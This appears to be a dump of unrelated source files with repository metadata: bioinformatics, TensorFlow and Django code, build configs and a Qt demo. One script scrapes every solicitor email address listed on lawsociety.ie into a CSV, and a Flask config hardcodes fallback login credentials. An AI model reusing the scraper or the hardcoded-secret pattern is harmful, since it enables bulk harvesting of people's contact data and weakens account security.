fastasf=rootname+'.aln' ; fpt=open(fastasf,'w')
fpt.write('>00000\n'+seq+'\n')
for i in range(len(msa)): fpt.write('>'+'%05d\n'%(i+1)+msa[i]+'\n')
fpt.close()
#run clustalw
os.system('clustalw -OUTORDER=INPUT -INFILE='+fastasf+' -OUTPUT=GCG >/dev/null')
msf=rootname+'.msf'
if not os.path.exists(msf): Bye('ERROR: not msf file generated in jnet.py')
#run perl scripts to create the various inputs required by jnet
pastry('/bin/cp -r '+codedir+'/bin/jnet/perl .')
pastry('/bin/cp -r '+codedir+'/bin/jnet/bin .')
os.system('./perl/msf2jnet '+msf) ; msffa=msf+'.fa' #multiple sequence alignment
os.system('./perl/gethmm '+msf+' >/dev/null') ; msfhm=msf+'.hmmprof' #hidden-Markov model
pssmf=blastOuts['pssm']
os.system('./perl/getpssm '+pssmf+' > '+pssmf+'.jnetpssm') ; pssmf=pssmf+'.jnetpssm'
#run jnet and parse to generate seq.dat
jnetout=junkName()
os.system('./bin/jnet -p '+msffa+' '+msfhm+' '+pssmf+' '+blastffreq+' > '+jnetout)
pattern=re.compile(':\s(\S+)\n') ; final='' ; conf=''
ss2nn={'-':1, 'H':2, 'E':4}
for line in os.popen('grep -P "\sFINAL\t" '+jnetout).readlines():
final+=pattern.search(line).group(1)
for line in os.popen('grep -P "\sCONF\t" '+jnetout).readlines():
conf+=pattern.search(line).group(1)
out=open(outf,'w')
for i in range(N):
out.write( '%5d%6s%5d%5d\n'%( i+1, one2three[seq[i]], ss2nn[final[i]], int(conf[i]) ) )
out.close()
#clean-up working directory
os.chdir(currd)
#os.system('/bin/rm -rf '+workd)
sys.exit(0)
| [
"borreguero@gmail.com"
] | borreguero@gmail.com |
3c7e836b0ae3a089ae38ec027c2ac8499c8a5dc1 | 7dfe4fad8d7b3583a5a69bb566fdb42910d6b50b | /models/submethods.py | 834c373886c3fe2e45edbdb2271241547d3c003f | [] | no_license | take610/komugi | 35c9926035b42cc5fc373b208c838daef1c7afde | dea71fb8d1765ce761d075c5298262e82b337c71 | refs/heads/master | 2022-11-23T11:30:46.783806 | 2020-07-27T16:51:07 | 2020-07-27T16:51:07 | 281,337,879 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 744 | py | import torch
from torch import nn
class LabelSmoothing(nn.Module):
def __init__(self, smoothing = 0.05):
super(LabelSmoothing, self).__init__()
self.confidence = 1.0 - smoothing
self.smoothing = smoothing
def forward(self, x, target):
if self.training:
x = x.float()
target = target.float()
logprobs = torch.nn.functional.log_softmax(x, dim=-1)
nll_loss = -logprobs * target
nll_loss = nll_loss.sum(-1)
smooth_loss = -logprobs.mean(dim=-1)
loss = self.confidence * nll_loss + self.smoothing * smooth_loss
return loss.mean()
else:
return torch.nn.functional.cross_entropy(x, target) | [
""
] | |
3c14f798c81ccf5b68cfd4c2f17fa28fbda526b5 | ad2692dc7b93e58707ea066d8c2af2581b09fe6d | /slcount.py | 82d2bdf6e62ee6e3a6d432e31bbd8cc5df09443b | [] | no_license | fedefraba/Python | 01087ed5919f8cc4c21e032bb6125246be836962 | 93d8d78b92ba87b112ff2118cc47b29d355cecab | refs/heads/master | 2021-02-06T02:34:44.531951 | 2020-03-11T23:24:46 | 2020-03-11T23:24:46 | 243,865,874 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 137 | py |
def single_letter_count(string,letter):
return string.lower().count(letter.lower())
print(single_letter_count("fruby","r")) | [
"fedefraba@gmail.com"
] | fedefraba@gmail.com |
80137af34837964be8bf789dbbcf21a7a1f05a3a | 3d386ef093427c227f0ba6637eedfbce044a2e9e | /tfbert/optimization/create_optimizer.py | ac6c1abc5c6bf2aebe07f51b89fe61f37dbec2ae | [] | no_license | HaierAI/tfbert | c3eeb77af70e79e925e72c393a3e8229feaf1a4a | 3779e59a4ebe7458ae732fef547f1168badbba2b | refs/heads/master | 2023-07-09T05:25:19.015760 | 2021-08-16T12:27:37 | 2021-08-16T12:27:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,278 | py | # -*- coding:utf-8 -*-
# @FileName :create_optimizer.py
# @Time :2021/1/31 19:58
# @Author :huanghui
import tensorflow.compat.v1 as tf
from .adamw import AdamWeightDecayOptimizer
from .lamb import LAMBOptimizer
from .schedule import lr_schedule
def create_optimizer(
learning_rate,
num_train_steps=None,
num_warmup_steps=None,
optimizer_type='adamw',
epsilon=1e-6,
momentum=0.,
weight_decay=0.01,
decay_method='poly',
mixed_precision=False,
init_loss_scale=2 ** 32
):
if decay_method is not None and num_train_steps is not None and num_warmup_steps is not None:
num_train_steps = int(num_train_steps)
num_warmup_steps = int(num_warmup_steps)
learning_rate = lr_schedule(
learning_rate, num_train_steps, num_warmup_steps,
decay_method=decay_method, optimizer_type=optimizer_type
)
if optimizer_type == 'adamw':
optimizer = AdamWeightDecayOptimizer(
learning_rate=learning_rate,
weight_decay_rate=weight_decay,
beta_1=0.9,
beta_2=0.999,
epsilon=epsilon,
exclude_from_weight_decay=["LayerNorm", "layer_norm", "bias"]
)
elif optimizer_type == 'lamb':
optimizer = LAMBOptimizer(
learning_rate,
weight_decay_rate=weight_decay,
beta_1=0.9,
beta_2=0.999,
epsilon=epsilon,
exclude_from_weight_decay=["LayerNorm", "layer_norm", "bias"]
)
elif optimizer_type == 'adam':
optimizer = tf.train.AdamOptimizer(
learning_rate=learning_rate,
beta1=0.9,
beta2=0.999,
epsilon=epsilon)
elif optimizer_type == 'sgd':
optimizer = tf.train.GradientDescentOptimizer(
learning_rate=learning_rate
)
elif optimizer_type == 'adadelta':
optimizer = tf.train.AdadeltaOptimizer(
learning_rate=learning_rate,
rho=0.95,
epsilon=epsilon,
)
elif optimizer_type == 'adagrad':
optimizer = tf.train.AdagradOptimizer(
learning_rate=learning_rate,
initial_accumulator_value=0.1
)
elif optimizer_type == 'rmsp':
optimizer = tf.train.RMSPropOptimizer(
learning_rate=learning_rate,
decay=0.9,
momentum=momentum,
epsilon=epsilon,
)
else:
raise ValueError('Unsupported optimizer option: %s' % optimizer_type)
if mixed_precision:
loss_scaler = tf.train.experimental.DynamicLossScale(
initial_loss_scale=init_loss_scale, increment_period=1000,
multiplier=2.0)
optimizer = tf.train.experimental.enable_mixed_precision_graph_rewrite(optimizer, loss_scaler)
loss_scale_value = tf.identity(loss_scaler(), name="loss_scale")
return optimizer
def create_train_op(
optimizer,
grads_and_vars,
max_grad=1.0,
mixed_precision=False,
gradient_accumulation_steps=1):
global_step = tf.train.get_or_create_global_step()
if gradient_accumulation_steps > 1:
local_step = tf.get_variable(name="local_step", shape=[], dtype=tf.int32, trainable=False,
initializer=tf.zeros_initializer)
batch_finite = tf.get_variable(name="batch_finite", shape=[], dtype=tf.bool, trainable=False,
initializer=tf.ones_initializer)
accum_vars = [tf.get_variable(
name=tvar.name.split(":")[0] + "/accum",
shape=tvar.shape.as_list(),
dtype=tf.float32,
trainable=False,
initializer=tf.zeros_initializer()) for tvar in tf.trainable_variables()]
reset_step = tf.cast(tf.math.equal(local_step % gradient_accumulation_steps, 0), dtype=tf.bool)
local_step = tf.cond(reset_step, lambda: local_step.assign(tf.ones_like(local_step)),
lambda: local_step.assign_add(1))
grads_and_vars_and_accums = [(gv[0], gv[1], accum_vars[i]) for i, gv in enumerate(grads_and_vars) if
gv[0] is not None]
grads, tvars, accum_vars = list(zip(*grads_and_vars_and_accums))
all_are_finite = tf.reduce_all(
[tf.reduce_all(tf.is_finite(g)) for g in grads]) if mixed_precision else tf.constant(
True,
dtype=tf.bool)
batch_finite = tf.cond(reset_step,
lambda: batch_finite.assign(
tf.math.logical_and(tf.constant(True, dtype=tf.bool), all_are_finite)),
lambda: batch_finite.assign(tf.math.logical_and(batch_finite, all_are_finite)))
# This is how the model was pre-trained.
# ensure global norm is a finite number
# to prevent clip_by_global_norm from having a hizzy fit.
(clipped_grads, _) = tf.clip_by_global_norm(
grads, clip_norm=max_grad)
accum_vars = tf.cond(reset_step,
lambda: [accum_vars[i].assign(grad) for i, grad in enumerate(clipped_grads)],
lambda: [accum_vars[i].assign_add(grad) for i, grad in enumerate(clipped_grads)])
def update(accum_vars):
return optimizer.apply_gradients(list(zip(accum_vars, tvars)))
update_step = tf.identity(
tf.cast(tf.math.equal(local_step % gradient_accumulation_steps, 0), dtype=tf.bool),
name="update_step")
update_op = tf.cond(update_step,
lambda: update(accum_vars), lambda: tf.no_op())
new_global_step = tf.cond(tf.math.logical_and(update_step, batch_finite),
lambda: global_step + 1,
lambda: global_step)
new_global_step = tf.identity(new_global_step, name='step_update')
train_op = tf.group(update_op, [global_step.assign(new_global_step)])
else:
grads_and_vars = [(g, v) for g, v in grads_and_vars if g is not None]
grads, tvars = list(zip(*grads_and_vars))
all_are_finite = tf.reduce_all(
[tf.reduce_all(tf.is_finite(g)) for g in grads]) if mixed_precision else tf.constant(True,
dtype=tf.bool)
# This is how the model was pre-trained.
# ensure global norm is a finite number
# to prevent clip_by_global_norm from having a hizzy fit.
(clipped_grads, _) = tf.clip_by_global_norm(
grads, clip_norm=max_grad)
# 这里不要传入global step,adam内部没有对global step累加
# 而原本adam等tf内置优化器会累加,这样就会造成global step重复增加
train_op = optimizer.apply_gradients(
list(zip(clipped_grads, tvars)))
new_global_step = tf.cond(all_are_finite, lambda: global_step + 1, lambda: global_step)
new_global_step = tf.identity(new_global_step, name='step_update')
train_op = tf.group(train_op, [global_step.assign(new_global_step)])
return train_op
| [
"m13021933043@163.com"
] | m13021933043@163.com |
50499ed278f1c769e6003b5e965f70ca46dd96e2 | 8972658ca2c64703e8281db89d7a6ac47cbabbf7 | /backend/tests/models.py | db9754be03118136304be7ed51dc6c7b912ed427 | [
"MIT"
] | permissive | denisorehovsky/linkanywhere | 15721824719cc8a959cdddb4178cfe754eb4862d | e21d6725fbe0e74a7301e40f9d9bdbac17c68e68 | refs/heads/master | 2022-07-21T16:16:17.412930 | 2017-08-24T06:32:37 | 2017-08-24T06:32:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 567 | py | import uuid
from django.db import models
from linkanywhere.apps.base.behaviors import Published
class TestModel(models.Model):
"""
Base for test models that sets app_label, so they play nicely.
"""
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
class Meta:
app_label = 'tests'
abstract = True
class BasicModel(TestModel):
text = models.CharField(max_length=100)
class LikeModel(TestModel):
text = models.CharField(max_length=100)
class PublishedModel(Published, TestModel):
pass
| [
"denis.orehovsky@gmail.com"
] | denis.orehovsky@gmail.com |
bd9e3d8529d21ceea5715087109dabadddcf6110 | 8a250a2e9606e59f814441a9a58544f9c9799931 | /app/__init__.py | 43e91d86655b50b7d6ed9bb60755bc8246853659 | [] | no_license | magalvez/customerservice | 68a9c5e8941c064f201461ba4b0270d79bb12a4a | 994a7212633f2e9dcfd77a3b167fe2284188470f | refs/heads/master | 2023-04-20T16:16:25.977589 | 2021-05-09T00:37:46 | 2021-05-09T00:37:46 | 365,247,386 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 930 | py | """
Flask app module
"""
from os import environ
from flask import Flask
app = Flask(__name__)
app.config.from_object("default_config")
AUTH_USER = environ.get("AUTH_USER") or 'playvox'
AUTH_PASS = environ.get("AUTH_PASS") or 'pl4yv0x'
AUTH_API_V1_URL = environ.get("ATS_API_V1_URL") or 'http://localhost:8100/service/auth'
US_API_V1_URL = environ.get("US_API_V1_URL") or 'http://localhost:8200/userservice/api/v1.0'
BAS_API_V1_URL = environ.get("BAS_API_V1_URL") or 'http://localhost:8300/bankaccountservice/api/v1.0'
AUTH_URL = AUTH_API_V1_URL
US_VALIDATE_USER_ACCOUNT_URL = US_API_V1_URL + '/validate-user-account'
BANK_ACCOUNT_GET_ACCOUNT_URL = BAS_API_V1_URL + '/account/{user_id}'
BANK_ACCOUNT_DEPOSIT_URL = BAS_API_V1_URL + '/account/{account_number}/deposit'
BANK_ACCOUNT_WITHDRAWAL_URL = BAS_API_V1_URL + '/account/{account_number}/withdrawal'
# TRM
TRM_USER_SERVICE_URL = 'https://trm-colombia.vercel.app/?date={}'
| [
"galvez.alejo@gmail.com"
] | galvez.alejo@gmail.com |
83c9e1cef1bf0fd0cd9b81c52c7537538af0d398 | d875c4556aa03193cb81fbf6388faee91c2b3de0 | /basic_programming/imtired.py | 348cd81ee858b2c49c6ea0b19ce442b0df7210e1 | [] | no_license | JeongaHan/pythonprogramming | 820abff1567b4b96a4f7edbbb27925840dcc3a20 | 00819cae30c2a7b0d5b67b14739c57919b68dbd0 | refs/heads/master | 2023-05-20T09:22:37.024797 | 2021-06-07T00:10:19 | 2021-06-07T00:10:19 | 294,134,503 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 84 | py | print("I am soooooo tired")
print("I am sooooooooooooooooooo tired....")
print("Hi") | [
"ab012121@naver.com"
] | ab012121@naver.com |
9ab61ddea3a8f45f1f40b9490b41e4da6d9a6544 | 786de89be635eb21295070a6a3452f3a7fe6712c | /SConsTools/tags/V00-00-16/src/standardExternalPackage.py | f433403d52307a3f120d028b2d80755d194bb0c7 | [] | no_license | connectthefuture/psdmrepo | 85267cfe8d54564f99e17035efe931077c8f7a37 | f32870a987a7493e7bf0f0a5c1712a5a030ef199 | refs/heads/master | 2021-01-13T03:26:35.494026 | 2015-09-03T22:22:11 | 2015-09-03T22:22:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,349 | py | #===============================================================================
#
# SConscript fuction for standard external package
#
# $Id$
#
#===============================================================================
import os
import sys
from os.path import join as pjoin
from fnmatch import fnmatch
from SCons.Defaults import *
from SCons.Script import *
from SConsTools.trace import *
from SConsTools.dependencies import *
#
# This is an interface package for the external package. We wan to make
# symlinks to the include files, libs and binaries
#
# build package name from prefix and directory
def _absdir ( prefix, dir ):
if not dir :
return None
if prefix and not os.path.isabs( dir ) :
dir = pjoin( prefix, dir )
if not os.path.isdir( dir ) :
dir = None
return dir
def _glob ( dir, patterns ):
if patterns is None :
return os.listdir(dir)
# patterns could be space-separated string of patterns
if isinstance(patterns,(str,unicode)) :
patterns = patterns.split()
if not patterns : return []
result = []
for l in os.listdir(dir) :
for p in patterns :
if fnmatch ( l, p ) : result.append(l)
return result
#
# Define all builders for the external package
#
def standardExternalPackage ( package, **kw ) :
""" Understands following keywords (all are optional):
PREFIX - top directory of the external package
INCDIR - include directory, absolute or relative to PREFIX
PYDIR - Python src directory, absolute or relative to PREFIX
PYDIRSEP - if present and evaluates to True installs python code to a
separate directory arch/$LUSI_ARCH/python/<package>
LIBDIR - libraries directory, absolute or relative to PREFIX
LINKLIBS - library names to link, or all libs if not present
BINDIR - binaries directory, absolute or relative to PREFIX
LINKBINS - binary names to link, or all libs if not present
PKGLIBS - names of libraries that have to be linked for this package
DEPS - names of other packages that we depend upon
"""
pkg = os.path.basename(os.getcwd())
trace ( "Standard SConscript for external package `"+package+"'", "SConscript", 1 )
env = DefaultEnvironment()
prefix = kw.get('PREFIX',None)
trace ( "prefix: %s" % prefix, "standardExternalPackage", 3 )
# link include directory
inc_dir = _absdir ( prefix, kw.get('INCDIR',None) )
if inc_dir :
trace ( "include_dir: %s" % inc_dir, "standardExternalPackage", 5 )
# make 'geninc' directory if not there yet
archinc = Dir(env.subst("$ARCHINCDIR"))
archinc = str(archinc)
if not os.path.isdir( archinc ) : os.makedirs( archinc )
target = pjoin(archinc,package)
if not os.path.lexists(target) : os.symlink ( inc_dir, target )
# link python directory
py_dir = _absdir ( prefix, kw.get('PYDIR',None) )
if py_dir :
trace ( "py_dir: %s" % py_dir, "standardExternalPackage", 5 )
if kw.get('PYDIRSEP',False) :
# make a link to the whole dir
targ = env.Symlink ( Dir(pjoin(env.subst("$PYDIR"),package)), Dir(py_dir) )
env['ALL_TARGETS']['LIBS'].extend ( targ )
else :
# make links for every file in the directory
files = os.listdir(py_dir)
for f in files :
loc = pjoin(py_dir,f)
if not os.path.isdir(loc) :
targ = env.Symlink ( pjoin(env.subst("$PYDIR"),f), loc )
env['ALL_TARGETS']['LIBS'].extend( targ )
# link all libraries
lib_dir = _absdir ( prefix, kw.get('LIBDIR',None) )
if lib_dir :
trace ( "lib_dir: %s" % lib_dir, "standardExternalPackage", 5 )
# make a list of libs to link
libraries = kw.get('LINKLIBS',None)
trace ( "libraries: %s" % libraries, "standardExternalPackage", 5 )
libraries = _glob ( lib_dir, libraries )
trace ( "libraries: %s" % libraries, "standardExternalPackage", 5 )
for f in libraries :
loc = pjoin(lib_dir,f)
if os.path.isfile(loc) :
#targ = env.Install( "$LIBDIR", loc )
targ = env.Symlink ( pjoin(env.subst("$LIBDIR"),f), loc )
trace ( "linklib: %s -> %s" % (str(targ[0]),loc), "standardExternalPackage", 5 )
env['ALL_TARGETS']['LIBS'].extend ( targ )
# link all executables
bin_dir = _absdir ( prefix, kw.get('BINDIR',None) )
if bin_dir :
trace ( "bin_dir: %s" % bin_dir, "standardExternalPackage", 5 )
# make list of binaries to link
binaries = kw.get('LINKBINS',None)
binaries = _glob ( bin_dir, binaries )
for f in binaries :
loc = pjoin(bin_dir,f)
if os.path.isfile(loc) :
targ = env.Symlink ( pjoin(env.subst("$BINDIR"),f), loc )
env['ALL_TARGETS']['BINS'].extend ( targ )
# add my libs to a package tree
setPkgLibs ( env, package, kw.get('PKGLIBS',[]) )
# add packages that I depend on
setPkgDeps ( env, package, kw.get('DEPS',[]) )
| [
"salnikov@b967ad99-d558-0410-b138-e0f6c56caec7"
] | salnikov@b967ad99-d558-0410-b138-e0f6c56caec7 |
b6e3a0da56981092c518c6077a20a0198020c546 | 9c379d265778d3672adac2cb4340dc7b3770e82c | /main.py | ac0e55f33eee9255407a63dd75fa9458dfa10505 | [] | no_license | tunstek/lawsociety.ie_email_scraper | 9de488e1baac54d21876b7fee826f4c71c47534f | eaee94e252cdd3b06f08488cafd82475e66738dd | refs/heads/master | 2021-08-08T23:23:50.540429 | 2017-11-11T15:44:58 | 2017-11-11T15:44:58 | 110,357,550 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,253 | py | import sys
sys.path.append("/usr/local/lib/python2.7/site-packages")
from lxml import html
import requests
#**************************************
#********* MAIN PROGRAM ***************
#**************************************
def main():
counties = ["Antrim","Armagh","Carlow","Cavan","Clare","Cork",
"Derry","Donegal","Down","Dublin","Fermanagh","Galway",
"Kerry","Kildare","Kilkenny","Laois","Leitrim","Limerick",
"Longford","Louth","Mayo","Meath","Monaghan","Offaly",
"Roscommon","Sligo","Tipperary","Tyrone","Waterford",
"Westmeath","Wexford","Wicklow"]
emailCount = 0;
# Clear the previous .csv
f = open("emails.csv","w+")
f.write("")
f.close()
noSeperationUnique(counties)
def noSeperationUnique(counties):
# gives a unique list of all emails
allEmails = []
emailCount = 0
# Scrape info for each county
print "Scraping emails.."
for county in counties:
url = "https://www.lawsociety.ie/Find-a-Solicitor/Solicitor-Firm-Search/?filters=t_tab2!l_"+county+"!s_firmname!p_150!n_1#tab2"
tree = html.fromstring(requests.get(url).content)
emails = tree.xpath('//*[@class="base clearfix"]/div/div[1]/div[2]/div[2]/a[1]/text()')
emailCount = emailCount + len(emails)
allEmails.extend(emails)
print "\n\nTotal Emails:", emailCount
#Remove duplicates
allEmails = list(set(allEmails))
#Write to .csv
print "Writing to .csv.."
f = open("emails.csv","a")
for email in allEmails:
f.write(email+"\n")
f.close()
def countySeperated(counties):
# Will contain duplicates
emailCount = 0
# Scrape info for each county
for county in counties:
url = "https://www.lawsociety.ie/Find-a-Solicitor/Solicitor-Firm-Search/?filters=t_tab2!l_"+county+"!s_firmname!p_150!n_1#tab2"
tree = html.fromstring(requests.get(url).content)
emails = tree.xpath('//*[@class="base clearfix"]/div/div[1]/div[2]/div[2]/a[1]/text()')
emailCount = emailCount + len(emails)
print "\n\n", county
print emails
print "\n\nTotal Emails:", emailCount
if __name__ == '__main__':
main()
| [
"tunstek@tcd.ie"
] | tunstek@tcd.ie |
320464340ee7fd6e0274866a46bba250709cf1c2 | abecf9dcfac54caef27dbb3dcb82babadd9904e0 | /Net/__init__.py | 56367dc6ca5dd633d5ff4c98042c22e7e1658cbe | [
"MIT"
] | permissive | SWT-AITeam/GHE-LPC | f27630fa36ff2fe7249892232c981129c28e9057 | 2a10f423d747aa28560a3bcbf29f7ec87422beb8 | refs/heads/main | 2023-09-01T13:31:19.466871 | 2021-10-23T13:47:28 | 2021-10-23T13:47:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 74 | py | from .MyModel import MyModel
from .LabelSmoothLoss import LabelSmoothLoss
| [
"hanrd@foxmail.com"
] | hanrd@foxmail.com |
2b90598d9fb955462761d3ab09d7b242cd0ff23d | 63cf040b00cb7a81baacb4fcbceac0b5fe278f82 | /ch09/dataset_dummy.py | fda4589e1f6eb9700dab35c2c66ee54f60abe94a | [] | no_license | mindw96/nalcoding | 64a16dab7c51510f1a6f07fc8c3b4a0dff054263 | b7104f17ba5ee9cac417c2f0c8bdaccab5d54664 | refs/heads/master | 2023-05-04T08:23:10.144124 | 2021-05-28T13:47:41 | 2021-05-28T13:47:41 | 349,375,264 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 338 | py | from dataset import Dataset
class DummyDataset(Dataset):
def __init__(self, name, mode, input_shape, output_shape):
super(DummyDataset, self).__init__(name, mode)
self.input_shape = input_shape
self.output_shape = output_shape
self.tr_xs, self.tr_ys = [], []
self.te_xs, self.te_ys = [], []
| [
"mindw96@naver.com"
] | mindw96@naver.com |
6789512f4fd4b7f6a31a460b4fef7ea02ab05d1a | ea911344f2dd24e37afc9fd813826c8988057608 | /node_modules/websocket/build/config.gypi | 503630b9608474a864613d1c16af7dd42099471b | [
"Apache-2.0"
] | permissive | evrimulgen/websocket-chat-room | 21e3bcb6a15f6ba67ac0efc6ee8a46faf53ca7ee | c0ebde1d3023d41ac814bca3af1e7687a5a915c0 | refs/heads/master | 2021-04-30T01:38:11.650441 | 2018-02-03T16:41:31 | 2018-02-03T16:41:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,340 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"asan": 0,
"debug_devtools": "node",
"force_dynamic_crt": 0,
"host_arch": "x64",
"icu_data_file": "icudt57l.dat",
"icu_data_in": "../../deps/icu-small/source/data/in/icudt57l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "deps/icu-small",
"icu_small": "true",
"icu_ver_major": "57",
"llvm_version": 0,
"node_byteorder": "little",
"node_enable_d8": "false",
"node_enable_v8_vtunejit": "false",
"node_install_npm": "true",
"node_module_version": 48,
"node_no_browser_globals": "false",
"node_prefix": "/",
"node_release_urlbase": "https://nodejs.org/download/release/",
"node_shared": "false",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_bundled_v8": "true",
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_lttng": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"node_use_v8_platform": "true",
"openssl_fips": "",
"openssl_no_asm": 0,
"shlib_suffix": "48.dylib",
"target_arch": "x64",
"uv_parent_path": "/deps/uv/",
"uv_use_dtrace": "true",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_inspector": "true",
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_random_seed": 0,
"v8_use_snapshot": "true",
"want_separate_host_toolset": 0,
"xcode_version": "7.0",
"nodedir": "/Users/FuD/.node-gyp/6.9.1",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"dry_run": "",
"legacy_bundling": "",
"save_dev": "",
"browser": "",
"only": "",
"viewer": "man",
"also": "",
"rollback": "true",
"usage": "",
"globalignorefile": "/Users/FuD/.nvm/versions/node/v6.9.1/etc/npmignore",
"init_author_url": "",
"maxsockets": "50",
"shell": "/bin/zsh",
"parseable": "",
"shrinkwrap": "true",
"init_license": "ISC",
"if_present": "",
"cache_max": "Infinity",
"init_author_email": "",
"sign_git_tag": "",
"cert": "",
"git_tag_version": "true",
"local_address": "",
"long": "",
"fetch_retries": "2",
"npat": "",
"registry": "https://registry.npmjs.org/",
"key": "",
"message": "%s",
"versions": "",
"globalconfig": "/Users/FuD/.nvm/versions/node/v6.9.1/etc/npmrc",
"always_auth": "",
"cache_lock_retries": "10",
"global_style": "",
"heading": "npm",
"fetch_retry_mintimeout": "10000",
"proprietary_attribs": "true",
"access": "",
"json": "",
"description": "true",
"engine_strict": "",
"https_proxy": "",
"init_module": "/Users/FuD/.npm-init.js",
"userconfig": "/Users/FuD/.npmrc",
"node_version": "6.9.1",
"user": "501",
"save": "true",
"editor": "vi",
"tag": "latest",
"global": "",
"progress": "true",
"optional": "true",
"bin_links": "true",
"force": "",
"searchopts": "",
"depth": "Infinity",
"rebuild_bundle": "true",
"searchsort": "name",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"ca": "",
"save_prefix": "^",
"strict_ssl": "true",
"tag_version_prefix": "v",
"dev": "",
"fetch_retry_factor": "10",
"group": "20",
"save_exact": "",
"cache_lock_stale": "60000",
"version": "",
"cache_min": "10",
"cache": "/Users/FuD/.npm",
"searchexclude": "",
"color": "true",
"save_optional": "",
"user_agent": "npm/3.10.8 node/v6.9.1 darwin x64",
"ignore_scripts": "",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"init_version": "1.0.0",
"umask": "0022",
"git": "git",
"init_author_name": "",
"scope": "",
"onload_script": "",
"tmp": "/var/folders/rs/mxl65xfx6k96_y0nnxz0fkkc0000gn/T",
"unsafe_perm": "true",
"link": "",
"prefix": "/Users/FuD/.nvm/versions/node/v6.9.1"
}
}
| [
"dan82625@gmail.com"
] | dan82625@gmail.com |
9dfb673fc79b36b0f863db50379bde72f6854fc2 | 5f63f2956ed341f482333fd79222ee95cf6cf325 | /0x11-python-network_1/3-error_code.py | 44fb1077692face6be73caa247d4f4cb3a8b369d | [] | no_license | jgadelugo/holbertonschool-higher_level_programming | 5f50bafdeae6b9cd8d6079f03ba2183d5d3d88b4 | f0236088c85a04b1928139eda48c66014f09ac17 | refs/heads/master | 2020-07-22T23:30:18.228771 | 2020-06-03T15:38:28 | 2020-06-03T15:38:28 | 207,367,705 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | #!/usr/bin/python3
""" Sends a POST request with email and return body """
from urllib import request
import urllib.error
from sys import argv
if __name__ == "__main__":
try:
with request.urlopen(argv[1]) as r:
print(r.read().decode('UTF-8'))
except urllib.error.HTTPError as e:
print('Error code:', e.code)
| [
"845@holbertonschool.com"
] | 845@holbertonschool.com |
07b9771037edce0c4e2a570f1a9de87d16043e06 | 1f3e98e3bb36765f869ca3177a47c53ce302ec70 | /test/input/090.py | f814763b5a4cd9f1e921ce531271080e0d788d1a | [
"MIT"
] | permissive | EliRibble/pyfmt | d73dec1061e93a28ad738139edf523e1678d0e19 | e84a5531a7c06703eddd9dbc2072b0c8deae8c57 | refs/heads/master | 2020-04-01T10:57:18.521463 | 2019-05-24T21:39:18 | 2019-05-24T21:39:18 | 153,139,803 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11 | py | print(1/5)
| [
"eliribble@google.com"
] | eliribble@google.com |
4f538092180bbfb76794800e1033a644c8c2e551 | 275f85955acabac247fe306b0161a6d758f4d057 | /MauricioZelaya/circleOperations/perimeterCalculator.py | 1ad939e0bf030e63eb316f1c1fccb14d1fbc75a4 | [] | no_license | mauricioZelaya/QETraining_BDT_python | 295bb58a99a36b0b973afd153109c510191b4ec7 | d7cc798e7063ab32e5002e4deda3ddec8a8a0c59 | refs/heads/master | 2021-05-08T05:01:13.181273 | 2017-11-24T21:53:46 | 2017-11-24T21:53:46 | 108,473,352 | 0 | 0 | null | 2017-11-24T21:53:47 | 2017-10-26T22:43:32 | Python | UTF-8 | Python | false | false | 111 | py | from math import pi
def perimeterCalculator(radius):
return pi*radius**2
# print(perimeterCalculator(3))
| [
"zelaya.mauricio@gmail.com"
] | zelaya.mauricio@gmail.com |
23d48a400968017c6eaceec92d4ed09880e236de | 2315d3f8b2007b6716fa84d6e8794e2c8c1d7989 | /common_widgets/combobox/find_item_by_typing.py | 63e300fdba51633e617d30d2d1f5d4478568047c | [] | no_license | leoomo/Enjoy-Qt-Python-Binding | cd290efc4c8e5356e29678ef7c9e52889d96fc51 | b2994bb0c2009a459856738dc4e39a4aba534de2 | refs/heads/master | 2021-01-24T02:10:54.782505 | 2011-12-24T14:31:37 | 2011-12-24T14:31:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,192 | py | #!/usr/bin/env python
#-*- coding:utf-8 -*-
"""
find item of QComboBox by typing keyword
Test environment:
Mac OS X 10.6.8
http://www.pyside.org/docs/pyside/PySide/QtGui/QComboBox.html
"""
import sys
try:
from PySide import QtCore
from PySide import QtGui
except ImportError:
from PyQt4 import QtCore
from PyQt4 import QtGui
class Demo(QtGui.QWidget):
def __init__(self):
super(Demo, self).__init__()
x, y, w, h = 500, 200, 300, 400
self.setGeometry(x, y, w, h)
self.combo = QtGui.QComboBox(self)
self.combo.resize(200, 30)
self.combo.move(20, 60)
self.combo.setEditable(True)
self.combo.setInsertPolicy(QtGui.QComboBox.NoInsert)
self.combo.currentIndexChanged.connect(self._combo_currentIndexChanged)
self.items = (
'',
('Lisp', 'lisp.png', 'llll'),
('C', 'c.png', 'cccc'),
('Objective-C', 'objc.png', 'oooo'),
('Python', 'python.png', 'pppp'),
('Java', 'java.png', 'jjjj'),
)
